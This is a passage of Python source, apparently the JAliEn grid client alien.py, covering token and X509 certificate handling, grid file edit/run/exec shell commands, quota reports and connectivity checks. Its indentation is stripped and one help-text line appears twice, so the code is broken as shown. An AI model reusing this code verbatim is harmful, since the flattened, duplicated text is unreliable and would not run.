lfn_components = specs_split.split(lfn, maxsplit = 1) # NO comma allowed in grid names (hopefully)
lfn = lfn_components[0] # first item is the file path; what remains are the storage specifications
if not isWrite: lfn = expand_path_grid(wb, lfn)
specs = ''
if len(lfn_components) > 1: specs = lfn_components[1]
if write_meta:
out = lfn2meta(wb, lfn, local_file, specs, isWrite, strictspec, httpurl)
else:
out = lfn2uri(wb, lfn, local_file, specs, isWrite, strictspec, httpurl)
if not out:
return RET(1, '', f'Could not create URIs for: {lfn}')
return RET(0, out)
def token(wb, args: Union[None, list] = None) -> int:
"""(Re)create the tokencert and tokenkey files"""
if not wb: return 1
if not args: args = []
global AlienSessionInfo
tokencert, tokenkey = get_token_names(True)
ret_obj = SendMsg(wb, 'token', args, opts = 'nomsg')
if ret_obj.exitcode != 0: return retf_print(ret_obj)
tokencert_content = ret_obj.ansdict.get('results')[0].get('tokencert', '')
tokenkey_content = ret_obj.ansdict.get('results')[0].get('tokenkey', '')
if not tokencert_content or not tokenkey_content: return int(1)
if os.path.isfile(tokencert):
os.chmod(tokencert, 0o600) # make it writeable
os.remove(tokencert)
with open(tokencert, "w") as tcert: print(f"{tokencert_content}", file=tcert) # write the tokencert
os.chmod(tokencert, 0o400) # make it readonly
if os.path.isfile(tokenkey):
os.chmod(tokenkey, 0o600) # make it writeable
os.remove(tokenkey)
with open(tokenkey, "w") as tkey: print(f"{tokenkey_content}", file=tkey) # write the tokenkey
os.chmod(tokenkey, 0o400) # make it readonly
return ret_obj.exitcode
def token_regen(wb, args: Union[None, list] = None):
global AlienSessionInfo
if not AlienSessionInfo['use_usercert']:
wb_close(wb, code = 1000, reason = "Let's connect with usercert to be able to generate token")
try:
wb = InitConnection(use_usercert = True) # we have to reconnect with the new token
except Exception:
logging.debug(traceback.format_exc())
# now we are connected with usercert, so we can generate token
if token(wb, args) != 0: return wb
# we have to reconnect with the new token
wb_close(wb, code = 1000, reason = 'Re-initialize the connection with the new token')
try:
AlienSessionInfo['use_usercert'] = False
wb = InitConnection()
except Exception:
logging.debug(traceback.format_exc())
return wb
def DO_token(wb, args: Union[list, None] = None) -> RET:
if args is None: args = []
msg = "Print only command!!! Use >token-init< for token (re)generation, see below the arguments\n"
ret_obj = SendMsg(wb, 'token', args, opts = 'nokeys')
return ret_obj._replace(out = f'{msg}{ret_obj.out}')
def DO_token_init(wb, args: Union[list, None] = None) -> RET:
if args is None: args = []
if len(args) > 0 and is_help(args):
ret_obj = SendMsg(wb, 'token', ['-h'], opts = 'nokeys')
return ret_obj._replace(out = ret_obj.out.replace('usage: token', 'INFO: token is automatically created, use this for token customization\nusage: token-init'))
wb = token_regen(wb, args)
tokencert, tokenkey = get_token_names()
return CertInfo(tokencert)
def DO_edit(wb, args: Union[list, None] = None, editor: str = '') -> RET:
"""Edit a grid lfn; download a temporary, edit with the specified editor and upload the new file"""
if not args: args = ['-h']
if is_help(args):
msg = """Command format: edit lfn\nAfter editor termination the file will be uploaded if md5 differs
-datebck : the backup filename will be date based
N.B. EDITOR env var must be set or fallback will be mcedit (not checking if exists)"""
return RET(0, msg)
if not editor:
editor = os.getenv('EDITOR')
if not editor:
print_out('EDITOR env variable not set, we will fall back to mcedit (not checking if it exists)')
editor = 'mcedit -u'
versioned_backup = False
if get_arg(args, '-datebck'): versioned_backup = True
lfn = expand_path_grid(wb, args[-1]) # assume that the last argument is the lfn
# check for valid (single) specifications delimiter
count_tokens = collections.Counter(lfn)
if count_tokens[','] + count_tokens['@'] > 1:
msg = f"At most one of >,< or >@< tokens used for copy specification can be present in the argument. The offender is: {''.join(count_tokens)}"
return RET(64, '', msg) # EX_USAGE /* command line usage error */
specs = specs_split.split(lfn, maxsplit = 1) # NO comma allowed in grid names (hopefully)
lfn = specs.pop(0) # first item is the file path; what remains are the storage specifications
tmp = download_tmp(wb, lfn)
if tmp and os.path.isfile(tmp):
md5_begin = md5(tmp)
ret_obj = runShellCMD(f'{editor} {tmp}', captureout = False)
if ret_obj.exitcode != 0: return ret_obj
md5_end = md5(tmp)
if md5_begin != md5_end:
uploaded_file = upload_tmp(wb, tmp, ','.join(specs), dated_backup = versioned_backup)
os.remove(tmp) # clean up the temporary file no matter whether the upload was successful or not
return RET(0, f'Uploaded {uploaded_file}') if uploaded_file else RET(1, '', f'Error uploading {uploaded_file}')
return RET(0)
return RET(1, '', f'Error downloading {lfn}, editing could not be done.')
def DO_mcedit(wb, args: Union[list, None] = None) -> RET: return DO_edit(wb, args, editor = 'mcedit')
def DO_vi(wb, args: Union[list, None] = None) -> RET: return DO_edit(wb, args, editor = 'vi')
def DO_vim(wb, args: Union[list, None] = None) -> RET: return DO_edit(wb, args, editor = 'vim')
def DO_nano(wb, args: Union[list, None] = None) -> RET: return DO_edit(wb, args, editor = 'nano')
def DO_run(wb, args: Union[list, None] = None, external: bool = False) -> RET:
"""run shell_command lfn|alien: tagged lfns :: download lfn(s) as a temporary file and run shell command on the lfn(s)"""
if args is None: args = []
if not args: return RET(1, '', 'No shell command specified')
if is_help(args) or len(args) == 1:
msg_last = ('Command format: shell_command arguments lfn\n'
'N.B.!! the lfn must be the last element of the command!!\n'
'N.B.! The output and error streams will be captured and printed at the end of execution!\n'
'for working within application use <edit> or -noout argument\n'
'additional arguments recognized independently of the shell command:\n'
'-force : will re-download the lfn even if already present\n'
'-noout : will not capture output, the actual application can be used')
if external:
ret_obj = runShellCMD(f'{args[0]} -h', captureout = True, do_shell = True)
return ret_obj._replace(out = f'{ret_obj.out}\n{msg_last}')
msg = ('Command format: run shell_command arguments lfn\n'
'the lfn must be the last element of the command\n'
'N.B.! The output and error streams will be captured and printed at the end of execution!\n'
'for working within application use <edit>\n'
'additional arguments recognized independently of the shell command:\n'
'-force : will re-download the lfn even if already present\n'
'-noout : will not capture output, the actual application can be used')
return RET(0, msg)
overwrite = get_arg(args, '-force')
capture_out = not get_arg(args, '-noout') # -noout disables output capture
list_of_lfns = [arg for arg in args if 'alien:' in arg]
if not list_of_lfns: list_of_lfns = [args.pop(-1)]
tmp_list = [download_tmp(wb, lfn, overwrite) for lfn in list_of_lfns] # list of temporary downloads
new_args = [arg for arg in args if arg not in list_of_lfns] # command arguments without the files
args = list(new_args)
cmd = " ".join(args)
files = " ".join(tmp_list)
if tmp_list and all(os.path.isfile(tmp) for tmp in tmp_list):
return runShellCMD(f'{cmd} {files}', capture_out, do_shell = True)
return RET(1, '', f'There was an error downloading the following files:\n{chr(10).join(tmp_list)}')
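# Usage sketch (lfn is illustrative):
#   run grep -i error alien:/alice/some/job.log  # downloads the lfn(s) to temporaries, runs the command on them
#   run -noout vim alien:/alice/some/file.txt    # no output capture, the application takes over the terminal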
def DO_exec(wb, args: Union[list, None] = None) -> RET:
"""exec lfn :: download lfn as a temporary file and executed in the shell"""
if args is None: args = []
if not args or is_help(args):
msg = ('Command format: exec lfn list_of_arguments\n'
'N.B.! The output and error streams will be captured and printed at the end of execution!\n'
'for working within application use <edit>')
return RET(0, msg)
overwrite = get_arg(args, '-force')
capture_out = not get_arg(args, '-noout') # -noout disables output capture
lfn = args.pop(0) # the script to be executed
opt_args = " ".join(args)
tmp = download_tmp(wb, lfn, overwrite)
if tmp and os.path.isfile(tmp):
os.chmod(tmp, 0o700)
return runShellCMD(f'{tmp} {opt_args}' if opt_args else tmp, capture_out)
return RET(1, '', f'There was an error downloading script: {lfn}')
def DO_syscmd(wb, cmd: str = '', args: Union[None, list, str] = None) -> RET:
"""run system command with all the arguments but all alien: specifications are downloaded to temporaries"""
global AlienSessionInfo
if args is None: args = []
if isinstance(args, str): args = args.split()
if not cmd: return RET(1, '', 'No system command specified!')
new_arg_list = [download_tmp(wb, arg) if arg.startswith('alien:') else arg for arg in args]
new_arg_list.insert(0, cmd)
return runShellCMD(' '.join(new_arg_list), captureout = True, do_shell = True)
def DO_find2(wb, args: list) -> RET:
if args is None: args = []
if is_help(args):
msg_client = (f'''Client-side implementation of find; it contains the following helpers.
Command format: find2 <options> <directory>
-select <pattern> : select only these files; {PrintColor(COLORS.BIGreen)}N.B. this is a REGEX applied to the full path!!!{PrintColor(COLORS.ColorReset)} defaults to all ".*"
-name <pattern> : select only these files; {PrintColor(COLORS.BIGreen)}N.B. this is a REGEX applied to a directory or file name!!!{PrintColor(COLORS.ColorReset)} defaults to all ".*"
-name <verb>_string : where verb = begin|contain|ends|ext and string is the text selection criteria. verbs are additive e.g.:
-name begin_myf_contain_run1_ends_bla_ext_root
{PrintColor(COLORS.BIRed)}N.B. the text to be filtered cannot have an underscore <_> within!!!{PrintColor(COLORS.ColorReset)}\n
The server options:''')
The server options:''')
srv_answ = get_help_srv(wb, 'find')
msg_srv = srv_answ.out
return RET(0, f'{msg_client}\n{msg_srv}')
find_args = ['-a', '-s'] # we always pass -a and -s to the server
get_arg(args, '-a') # consume them if the user already specified them
get_arg(args, '-s')
if get_arg(args, '-v'): print_out("Verbose mode not implemented, ignored")
pattern = '*'
pattern_regex = None
use_regex = False
filtering_enabled = False
glob_arg = get_arg_value(args, '-glob')
if glob_arg:
pattern = glob_arg
use_regex = False
filtering_enabled = True
select_arg = get_arg_value(args, '-select')
if select_arg:
if filtering_enabled:
msg = "Only one rule of selection can be used, either -select (full path match), -name (match on file name) or -glob (globbing)"
return RET(22, '', msg) # EINVAL /* Invalid argument */
pattern_regex = select_arg
use_regex = True
filtering_enabled = True
name_arg = get_arg_value(args, '-name')
if name_arg:
if filtering_enabled:
msg = "Only one rule of selection can be used, either -select (full path match), -name (match on file name) or -glob (globbing)"
return RET(22, '', msg) # EINVAL /* Invalid argument */
pattern_regex_arg = name_arg
use_regex = True
filtering_enabled = True
pattern_regex = name2regex(pattern_regex_arg)
if use_regex and not pattern_regex:
msg = ("No selection verbs were recognized!"
"usage format is -name <attribute>_<string> where attribute is one of: begin, contain, ends, ext"
f"The invalid pattern was: {pattern_regex_arg}")
return RET(22, '', msg) # EINVAL /* Invalid argument */
if use_regex:
find_args.insert(0, '-r')
pattern = pattern_regex
start_location = args[-1] if filtering_enabled else args[-2]
find_args.append(expand_path_grid(wb, start_location))
find_args.append(pattern)
return SendMsg(wb, 'find', find_args, opts = 'nokeys')
def runShellCMD(INPUT: str = '', captureout: bool = True, do_shell: bool = False, timeout: Union[str, int, None] = None) -> RET:
"""Run shell command in subprocess; if exists, print stdout and stderr"""
if not INPUT: return RET(1, '', 'No command to be run provided')
sh_cmd = re.sub(r'^!', '', INPUT)
args = sh_cmd if do_shell else shlex.split(sh_cmd)
capture_args = {'stdout': subprocess.PIPE, 'stderr': subprocess.PIPE} if captureout else {}
status = exitcode = except_msg = None
msg_out = msg_err = ''
try:
status = subprocess.run(args, encoding = 'utf-8', errors = 'replace', shell = do_shell, timeout = timeout, **capture_args) # pylint: disable=subprocess-run-check
except subprocess.TimeoutExpired:
print_err(f"Expired timeout: {timeout} for: {sh_cmd}")
exitcode = int(62)
except FileNotFoundError:
print_err(f"Command not found: {sh_cmd}")
exitcode = int(2)
except Exception:
ex_type, ex_value, _ = sys.exc_info()
except_msg = f'Exception:: {ex_type} -> {ex_value}\n{traceback.format_exc()}\n'
exitcode = int(1)
if status:
if status.stdout: msg_out = status.stdout.strip()
if status.stderr: msg_err = status.stderr.strip()
exitcode = status.returncode
if except_msg: msg_err = f'{except_msg}{msg_err}'
return RET(exitcode, msg_out, msg_err)
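# Usage sketch:
#   runShellCMD('ls -la')                           # output captured and returned in RET
#   runShellCMD('!echo $HOME', do_shell = True)     # a leading '!' is stripped, the string goes to the shell
#   runShellCMD('mcedit file', captureout = False)  # interactive, nothing captured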
def DO_quota(wb, args: Union[None, list] = None) -> RET:
"""quota : put togheter both job and file quota"""
if not args: args = []
if is_help(args):
msg = ('Client-side implementation that makes use of server\'s jquota and fquota (hidden by this implementation)\n'
'Command format: quota [user]\n'
'if [user] is not provided, it will be assumed the current user')
return RET(0, msg)
user = AlienSessionInfo['user']
if len(args) > 0:
if args[0] != "set": # we asume that if 'set' is not used then the argument is a username
user = args[0]
else:
msg = '>set< functionality not implemented yet'
return RET(0, msg)
jquota_out = SendMsg(wb, f'jquota -nomsg list {user}')
jquota_dict = jquota_out.ansdict
fquota_out = SendMsg(wb, f'fquota -nomsg list {user}')
fquota_dict = fquota_out.ansdict
username = jquota_dict['results'][0]["username"]
running_time = float(jquota_dict['results'][0]["totalRunningTimeLast24h"])/3600
running_time_max = float(jquota_dict['results'][0]["maxTotalRunningTime"])/3600
running_time_perc = (running_time/running_time_max)*100
cpucost = float(jquota_dict['results'][0]["totalCpuCostLast24h"])/3600
cpucost_max = float(jquota_dict['results'][0]["maxTotalCpuCost"])/3600
cpucost_perc = (cpucost/cpucost_max)*100
unfinishedjobs_max = int(jquota_dict['results'][0]["maxUnfinishedJobs"])
waiting = int(jquota_dict['results'][0]["waiting"])
running = int(jquota_dict['results'][0]["running"])
unfinishedjobs_perc = ((waiting + running)/unfinishedjobs_max)*100
pjobs_nominal = int(jquota_dict['results'][0]["nominalparallelJobs"])
pjobs_max = int(jquota_dict['results'][0]["maxparallelJobs"])
size = float(fquota_dict['results'][0]["totalSize"])
size_MiB = size/(1024*1024)
size_max = float(fquota_dict['results'][0]["maxTotalSize"])
size_max_MiB = size_max/(1024*1024)
size_perc = (size/size_max)*100
files = float(fquota_dict['results'][0]["nbFiles"])
files_max = float(fquota_dict['results'][0]["maxNbFiles"])
files_perc = (files/files_max)*100
msg = (f"""Quota report for user : {username}
Unfinished jobs(R + W / Max):\t\t{running} + {waiting} / {unfinishedjobs_max} --> {unfinishedjobs_perc:.2f}% used
Running time (last 24h) used/max:\t{running_time:.2f}/{running_time_max:.2f}(h) --> {running_time_perc:.2f}% used
CPU Cost (last 24h) used/max:\t\t{cpucost:.2f}/{cpucost_max:.2f}(h) --> {cpucost_perc:.2f}% used
ParallelJobs (nominal/max) :\t{pjobs_nominal}/{pjobs_max}
Storage size :\t\t\t{size_MiB:.2f}/{size_max_MiB:.2f} MiB --> {size_perc:.2f}%
Number of files :\t\t{files}/{files_max} --> {files_perc:.2f}%""")
return RET(0, msg)
def check_ip_port(socket_object: tuple) -> bool:
"""Check connectivity to an address, port; adress should be the tuple given by getaddrinfo"""
if not socket_object: return False
is_open = False
# socket_object = (family, type, proto, canonname, sockaddr)
with socket.socket(socket_object[0],socket_object[1],socket_object[2]) as s: # Create a TCP socket
s.settimeout(2) # timeout 2s
try:
s.connect(socket_object[4])
is_open = True
except Exception as e:
pass
return is_open
def check_port(address: str, port: Union[str, int]) -> list:
"""Check TCP connection to fqdn:port"""
ip_list = socket.getaddrinfo(address, int(port), proto = socket.IPPROTO_TCP)
return [(*sock_obj[-1], check_ip_port(sock_obj)) for sock_obj in ip_list]
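# check_port() returns one (address, port, ..., is_open) tuple per resolved address
# (IPv6 sockaddrs carry extra fields). A hypothetical result:
#   check_port('alice-jcentral.cern.ch', 8097) -> [('188.184.x.y', 8097, True)]
# isReachable() below just ORs the is_open flags of that list.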
def isReachable(address: str = 'alice-jcentral.cern.ch', port: Union[str, int] = 8097) -> bool:
result_list = check_port(address, port)
for ip in result_list:
if ip[-1]: return True
return False
def DO_checkAddr(args: Union[list, None] = None) -> RET:
global AlienSessionInfo
if args is None: args = []
if is_help(args):
msg = ('checkAddr [reference] fqdn/ip port\n'
'defaults are: alice-jcentral.cern.ch 8097\n'
'reference arg will check connection to google dns and www.cern.ch')
return RET(0, msg)
result_list = []
if get_arg(args, 'reference'):
result_list.extend(check_port('8.8.8.8', 53))
result_list.extend(check_port('2001:4860:4860::8888', 53))
result_list.extend(check_port('www.cern.ch', 80))
addr = args[0] if args else 'alice-jcentral.cern.ch'
port = args[1] if (args and len(args) > 1) else 8097
result_list.extend(check_port(addr, port))
stdout = ''
for res in result_list:
stdout += f'{res[0]}:{res[1]} {PrintColor(COLORS.BIGreen) + "OK" if res[-1] else PrintColor(COLORS.BIRed) + "FAIL"}{PrintColor(COLORS.ColorReset)}\n'
return RET(0, stdout)
def get_help(wb, cmd: str = '') -> RET:
"""Return the help option even for client-side commands"""
if not cmd: return RET(1, '', 'No command specified for help')
return ProcessInput(wb, cmd, ['-h'])
def get_help_srv(wb, cmd: str = '') -> RET:
"""Return the help option for server-side known commands"""
if not cmd: return RET(1, '', 'No command specified for help request')
return SendMsg(wb, f'{cmd} -h')
def DO_help(wb, args: Union[list, None] = None) -> RET:
global AlienSessionInfo
if args is None: args = []
if not args:
msg = ('Project documentation can be found at:\n'
'https://jalien.docs.cern.ch/\n'
'https://gitlab.cern.ch/jalien/xjalienfs/blob/master/README.md\n'
'the following commands are available:')
nr = len(AlienSessionInfo['commandlist'])
column_width = 24
try:
columns = os.get_terminal_size()[0]//column_width
except Exception:
columns = 5
for ln in range(0, nr, columns):
el_ln = AlienSessionInfo['commandlist'][ln:ln + columns]
row = [str(i).ljust(column_width) for i in el_ln]
msg = f'{msg}\n{"".join(row)}'
return RET(0, msg)
return get_help(wb, args.pop(0))
def DO_user(wb, args: Union[list, None] = None) -> RET:
global AlienSessionInfo
if args is None: args = []
ret_obj = SendMsg(wb, 'user', args)
if ret_obj.exitcode == 0 and 'homedir' in ret_obj.ansdict['results'][0]: AlienSessionInfo['alienHome'] = ret_obj.ansdict['results'][0]['homedir']
return ret_obj
def DO_prompt(args: Union[list, None] = None) -> RET:
"""Add local dir and date information to the alien.py shell prompt"""
global AlienSessionInfo
if args is None: args = []
if not args or is_help(args):
msg = "Toggle the following in the command prompt : <date> for date information and <pwd> for local directory"
return RET(0, msg)
if 'date' in args: AlienSessionInfo['show_date'] = (not AlienSessionInfo['show_date'])
if 'pwd' in args: AlienSessionInfo['show_lpwd'] = (not AlienSessionInfo['show_lpwd'])
return RET(0)
def get_list_entries(wb, lfn, fullpath: bool = False) -> list:
"""return a list of entries of the lfn argument, full paths if 2nd arg is True"""
key = 'path' if fullpath else 'name'
ret_obj = SendMsg(wb, 'ls', ['-nomsg', '-a', '-F', os.path.normpath(lfn)])
return list(item[key] for item in ret_obj.ansdict['results']) if ret_obj.exitcode == 0 else []
def lfn_list(wb, lfn: str = ''):
"""Completer function : for a given lfn return all options for latest leaf"""
if not wb: return []
if not lfn: lfn = '.' # AlienSessionInfo['currentdir']
list_lfns = []
lfn_path = Path(lfn)
base_dir = '/' if lfn_path.parent.as_posix() == '/' else f'{lfn_path.parent.as_posix()}/'
name = f'{lfn_path.name}/' if lfn.endswith('/') else lfn_path.name
def item_format(base_dir, name, item):
# print_out(f'\nbase_dir: {base_dir} ; name: {name} ; item: {item}')
if name.endswith('/') and name != '/':
return f'{name}{item}' if base_dir == './' else f'{base_dir}{name}{item}'
return item if base_dir == './' else f'{base_dir}{item}'
if lfn.endswith('/'):
listing = get_list_entries(wb, lfn)
list_lfns = [item_format(base_dir, name, item) for item in listing]
else:
listing = get_list_entries(wb, base_dir)
list_lfns = [item_format(base_dir, name, item) for item in listing if item.startswith(name)]
# print_out(f'\n{list_lfns}\n')
return list_lfns
def wb_ping(wb) -> float:
"""Websocket ping function, it will return rtt in ms"""
init_delta = float(-999.0)
init_begin = datetime.datetime.now().timestamp()
if IsWbConnected(wb):
init_end = datetime.datetime.now().timestamp()
init_delta = float((init_end - init_begin) * 1000)
return init_delta
return float(-1)
def DO_ping(wb, args: Union[list, None] = None) -> RET:
"""Command implementation for ping functionality"""
if args is None: args = []
if is_help(args): return RET(0, "ping <count>\nwhere count is integer")
if len(args) > 0 and args[0].isdigit():
count = int(args[0])
elif not args:
count = int(3)
else:
return RET(1, '', 'Unrecognized argument, it should be int type')
results = []
for i in range(count):
p = wb_ping(wb)
results.append(p)
rtt_min = min(results)
rtt_max = max(results)
rtt_avg = statistics.mean(results)
rtt_stddev = statistics.stdev(results) if len(results) > 1 else 0.0
endpoint = wb.remote_address[0]
msg = (f"Websocket ping/pong(s) : {count} time(s) to {endpoint}\nrtt min/avg/max/mdev (ms) = {rtt_min:.3f}/{rtt_avg:.3f}/{rtt_max:.3f}/{rtt_stddev:.3f}")
return RET(0, msg)
def get_files_cert() -> tuple:
return (os.getenv('X509_USER_CERT', f'{Path.home().as_posix()}/.globus/usercert.pem'), os.getenv('X509_USER_KEY', f'{Path.home().as_posix()}/.globus/userkey.pem'))
def get_token_names(files: bool = False) -> tuple:
if files:
return (f'{_TMPDIR}/tokencert_{str(os.getuid())}.pem', f'{_TMPDIR}/tokenkey_{str(os.getuid())}.pem')
else:
return os.getenv('JALIEN_TOKEN_CERT', f'{_TMPDIR}/tokencert_{str(os.getuid())}.pem'), os.getenv('JALIEN_TOKEN_KEY', f'{_TMPDIR}/tokenkey_{str(os.getuid())}.pem')
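# Token location sketch (uid- and _TMPDIR-dependent):
#   get_token_names(True) -> (f'{_TMPDIR}/tokencert_<uid>.pem', f'{_TMPDIR}/tokenkey_<uid>.pem')
#   get_token_names()     -> same defaults, unless JALIEN_TOKEN_CERT/JALIEN_TOKEN_KEY override them;
# the env variables may even hold the PEM content itself, which get_token_filenames() below
# materializes into temporary files before use.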
def DO_tokendestroy(args: Union[list, None] = None) -> RET:
if args is None: args = []
if len(args) > 0 and is_help(args): return RET(0, "Delete the token{cert,key}.pem files")
tokencert, tokenkey = get_token_names()
if os.path.exists(tokencert): os.remove(tokencert)
if os.path.exists(tokenkey): os.remove(tokenkey)
return RET(0, "Token was destroyed! Re-connect for token re-creation.")
def IsValidCert(fname: str):
"""Check if the certificate file (argument) is present and valid. It will return false also for less than 5min of validity"""
try:
with open(fname) as f:
cert_bytes = f.read()
except Exception:
return False
try:
x509 = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, cert_bytes)
except Exception:
return False
x509_notafter = x509.get_notAfter()
utc_time = datetime.datetime.strptime(x509_notafter.decode("utf-8"), "%Y%m%d%H%M%SZ")
time_notafter = int((utc_time - datetime.datetime(1970, 1, 1)).total_seconds())
time_current = int(datetime.datetime.now().timestamp())
time_remaining = time_notafter - time_current
return time_remaining > 300
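# IsValidCert treats a certificate with less than 5 minutes (300 s) of remaining validity as
# already invalid, so credentials are refreshed before they can expire mid-session, e.g.:
#   IsValidCert(get_token_names(True)[0])  # True only while > 300 s of validity remain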
def CertInfo(fname: str) -> RET:
"""Print certificate information (subject, issuer, notbefore, notafter)"""
try:
with open(fname) as f:
cert_bytes = f.read()
except Exception:
return RET(2, "", f"File >>>{fname}<<< not found") # ENOENT /* No such file or directory */
try:
x509 = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, cert_bytes)
except Exception:
return RET(5, "", f"Could not load certificate >>>{fname}<<<") # EIO /* I/O error */
utc_time_notafter = datetime.datetime.strptime(x509.get_notAfter().decode("utf-8"), "%Y%m%d%H%M%SZ")
utc_time_notbefore = datetime.datetime.strptime(x509.get_notBefore().decode("utf-8"), "%Y%m%d%H%M%SZ")
issuer = '/%s' % ('/'.join(['%s=%s' % (k.decode("utf-8"), v.decode("utf-8")) for k, v in x509.get_issuer().get_components()]))
subject = '/%s' % ('/'.join(['%s=%s' % (k.decode("utf-8"), v.decode("utf-8")) for k, v in x509.get_subject().get_components()]))
info = f"DN >>> {subject}\nISSUER >>> {issuer}\nBEGIN >>> {utc_time_notbefore}\nEXPIRE >>> {utc_time_notafter}"
return RET(0, info)
def DO_certinfo(args: Union[list, None] = None) -> RET:
if args is None: args = []
cert, key = get_files_cert()
if len(args) > 0 and is_help(args): return RET(0, "Print user certificate information", "")
return CertInfo(cert)
def DO_tokeninfo(args: Union[list, None] = None) -> RET:
if not args: args = []
if len(args) > 0 and is_help(args): return RET(0, "Print token certificate information", "")
tokencert, tokenkey = get_token_filenames()
return CertInfo(tokencert)
def CertVerify(fname: str) -> RET:
"""Print certificate information (subject, issuer, notbefore, notafter)"""
try:
with open(fname) as f:
cert_bytes = f.read()
except Exception:
return RET(2, "", f"File >>>{fname}<<< not found") # ENOENT /* No such file or directory */
try:
x509 = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, cert_bytes)
except Exception:
logging.debug(traceback.format_exc())
return RET(5, "", f"Could not load certificate >>>{fname}<<<") # EIO /* I/O error */
x509store = OpenSSL.crypto.X509Store()
x509store.set_flags(OpenSSL.crypto.X509StoreFlags.ALLOW_PROXY_CERTS)
ca_verify_location = get_ca_path()
try:
if os.path.isfile(ca_verify_location):
x509store.load_locations(cafile = ca_verify_location)
else:
x509store.load_locations(None, capath = ca_verify_location)
except Exception:
logging.debug(traceback.format_exc())
return RET(5, "", f"Could not load verify location >>>{ca_verify_location}<<<") # EIO /* I/O error */
store_ctx = OpenSSL.crypto.X509StoreContext(x509store, x509)
try:
store_ctx.verify_certificate()
return RET(0, f'SSL Verification {PrintColor(COLORS.BIGreen)}succesful{PrintColor(COLORS.ColorReset)} for {fname}')
except Exception:
logging.debug(traceback.format_exc())
return RET(1, '', f'SSL Verification {PrintColor(COLORS.BIRed)}failed{PrintColor(COLORS.ColorReset)} for {fname}')
def DO_certverify(args: Union[list, None] = None) -> RET:
if args is None: args = []
cert, key = get_files_cert()
if len(args) > 0 and is_help(args): return RET(0, "Verify the user cert against the found CA stores (file or directory)", "")
return CertVerify(cert)
def DO_tokenverify(args: Union[list, None] = None) -> RET:
if not args: args = []
if len(args) > 0 and is_help(args): return RET(0, "Print token certificate information", "")
tokencert, tokenkey = get_token_filenames()
return CertVerify(tokencert)
def CertKeyMatch(cert_fname: str, key_fname: str) -> RET:
"""Check if Certificate and key match"""
try:
with open(cert_fname) as f: cert_bytes = f.read()
x509cert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, cert_bytes)
except Exception:
logging.debug(traceback.format_exc())
return RET(5, "", f'Could not load certificate >>>{cert_fname}<<<') # EIO /* I/O error */
try:
with open(key_fname) as g: key_bytes = g.read()
x509key = OpenSSL.crypto.load_privatekey(OpenSSL.crypto.FILETYPE_PEM, key_bytes)
except Exception:
logging.debug(traceback.format_exc())
return RET(5, "", f'Could not load key >>>{key_fname}<<<') # EIO /* I/O error */
context = OpenSSL.SSL.Context(OpenSSL.SSL.TLSv1_METHOD)
context.use_privatekey(x509key)
context.use_certificate(x509cert)
try:
context.check_privatekey()
return RET(0, f'Cert/key {PrintColor(COLORS.BIGreen)}match{PrintColor(COLORS.ColorReset)}')
except OpenSSL.SSL.Error:
return RET(1, '', f'Cert/key {PrintColor(COLORS.BIRed)}DO NOT match{PrintColor(COLORS.ColorReset)}')
def DO_certkeymatch(args: Union[list, None] = None) -> RET:
if args is None: args = []
cert, key = get_files_cert()
if len(args) > 0 and is_help(args): return RET(0, "Check match of user cert with key cert", "")
return CertKeyMatch(cert, key)
def DO_tokenkeymatch(args: Union[list, None] = None) -> RET:
if args is None: args = []
cert, key = get_token_filenames()
if len(args) > 0 and is_help(args): return RET(0, "Check match of user token with key token", "")
return CertKeyMatch(cert, key)
def get_ca_path() -> str:
"""Return either the CA path or file; bailout application if not found"""
system_ca_path = '/etc/grid-security/certificates'
alice_cvmfs_ca_path_lx = '/cvmfs/alice.cern.ch/etc/grid-security/certificates'
alice_cvmfs_ca_path_macos = f'/Users/Shared{alice_cvmfs_ca_path_lx}'
x509file = os.getenv('X509_CERT_FILE') if os.path.isfile(str(os.getenv('X509_CERT_FILE'))) else ''
if x509file:
if _DEBUG: logging.debug(f'X509_CERT_FILE = {x509file}')
return x509file
x509dir = os.getenv('X509_CERT_DIR') if os.path.isdir(str(os.getenv('X509_CERT_DIR'))) else ''
if x509dir:
if _DEBUG: logging.debug(f'X509_CERT_DIR = {x509dir}')
return x509dir
capath_default = None
if os.path.exists(alice_cvmfs_ca_path_lx):
capath_default = alice_cvmfs_ca_path_lx
elif os.path.exists(alice_cvmfs_ca_path_macos):
capath_default = alice_cvmfs_ca_path_macos
else:
if os.path.exists(system_ca_path): capath_default = system_ca_path
if not capath_default:
msg = "No CA location or files specified or found!!! Connection will not be possible!!"
print_err(msg)
logging.info(msg)
sys.exit(2)
if _DEBUG: logging.debug(f'CApath = {capath_default}')
return capath_default
def get_token_filenames() -> tuple:
"""Get the token filenames, including the temporary ones used as env variables"""
global AlienSessionInfo
tokencert, tokenkey = get_token_names()
random_str = None
if not os.path.isfile(tokencert) and tokencert.startswith('-----BEGIN CERTIFICATE-----'): # and is not a file
random_str = str(uuid.uuid4())
temp_cert = tempfile.NamedTemporaryFile(prefix = 'tokencert_', suffix = f'_{str(os.getuid())}_{random_str}.pem', delete = False)
temp_cert.write(tokencert.encode(encoding="ascii", errors="replace"))
temp_cert.seek(0)
tokencert = temp_cert.name # temp file was created, let's give the filename to tokencert
AlienSessionInfo['templist'].append(tokencert)
if not os.path.isfile(tokenkey) and tokenkey.startswith('-----BEGIN RSA PRIVATE KEY-----'): # and is not a file
if random_str is None: random_str = str(uuid.uuid4())
temp_key = tempfile.NamedTemporaryFile(prefix = 'tokenkey_', suffix = f'_{str(os.getuid())}_{random_str}.pem', delete = False)
temp_key.write(tokenkey.encode(encoding="ascii", errors="replace"))
temp_key.seek(0)
tokenkey = temp_key.name # temp file was created, let's give the filename to tokenkey
AlienSessionInfo['templist'].append(tokenkey)
return (tokencert, tokenkey) if (IsValidCert(tokencert) and os.path.isfile(tokenkey)) else (None, None)
def create_ssl_context(use_usercert: bool = False) -> ssl.SSLContext:
"""Create SSL context using either the default names for user certificate and token certificate or X509_USER_{CERT,KEY} JALIEN_TOKEN_{CERT,KEY} environment variables"""
global AlienSessionInfo
# SSL SETTINGS
cert = key = None # vars for discovered credentials
usercert, userkey = get_files_cert()
tokencert, tokenkey = get_token_filenames()
if not use_usercert and tokencert and tokenkey:
cert, key = tokencert, tokenkey
AlienSessionInfo['use_usercert'] = False
else:
if not (os.path.exists(usercert) and os.path.exists(userkey)):
msg = "User certificate files NOT FOUND!!! Connection will not be possible!!"
print_err(msg)
logging.info(msg)
sys.exit(126)
cert, key = usercert, userkey
